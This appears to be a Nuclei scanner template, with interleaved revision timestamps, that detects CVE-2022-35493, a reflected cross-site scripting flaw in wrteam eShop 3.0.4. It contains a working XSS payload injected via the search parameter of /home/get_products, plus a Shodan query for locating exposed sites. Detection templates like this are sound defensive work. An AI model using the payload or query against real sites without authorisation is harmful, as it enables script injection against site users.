2022-08-09 19:09:47 +00:00
id : CVE-2022-35493
info :
2022-09-16 19:50:10 +00:00
name : eShop 3.0.4 - Cross-Site Scripting
2022-08-09 19:09:47 +00:00
author : arafatansari
2022-09-16 20:03:07 +00:00
severity : medium
2022-08-09 19:09:47 +00:00
description : |
2022-09-16 19:50:10 +00:00
eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website.
2023-09-06 11:59:08 +00:00
remediation : |
To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
2022-08-09 19:09:47 +00:00
reference :
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
2022-08-09 19:18:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-35493
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS
2022-08-16 14:25:34 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-35493
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2024-01-29 17:11:14 +00:00
epss-score : 0.00157
epss-percentile : 0.52174
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:*
2022-08-09 19:09:47 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : wrteam
product : eshop_-_ecommerce_\/_store_website
2023-09-06 11:59:08 +00:00
shodan-query : http.html:"eShop - Multipurpose Ecommerce"
2023-12-05 09:50:33 +00:00
tags : cve,cve2022,eshop,xss,wrteam
2022-08-09 19:09:47 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-09 19:09:47 +00:00
- method : GET
path :
2022-08-09 19:18:12 +00:00
- '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
2022-08-09 19:09:47 +00:00
matchers-condition : and
matchers :
2022-08-09 19:18:12 +00:00
- type : word
words :
- 'Search Result for \"><img src=x onerror=alert(document.domain)>'
2022-08-09 19:09:47 +00:00
- type : word
2022-08-09 19:18:12 +00:00
part : header
2022-08-09 19:09:47 +00:00
words :
2022-08-09 19:18:12 +00:00
- text/html
- type : status
status :
- 200
2024-01-30 06:46:18 +00:00
# digest: 4a0a0047304502202a6133499f5d377e9c10cce1deaaa1b80217ec22156f69d6175a9b958321a8d502210085ca957af87670643c6aed09bf0156a4c37519c0b98b77050dcbca0b85e8b814:922c64590222798bb761d5b6d8e72950